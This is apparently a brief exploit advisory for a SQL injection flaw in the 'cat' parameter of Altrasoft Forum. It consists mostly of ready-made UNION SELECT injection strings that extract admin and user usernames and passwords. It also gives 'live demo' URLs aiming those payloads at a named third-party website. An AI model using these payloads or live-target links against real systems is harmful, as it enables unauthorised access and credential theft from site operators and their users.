Altrasoft Forum (cat) Remote SQL Injection Vulnerability
Altrasoft Forum is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the admin and user credentials. The POC for admin credentials is index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- and for user credentials is index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--. Live demo for admin credentials is http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- and for user credentials is http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--.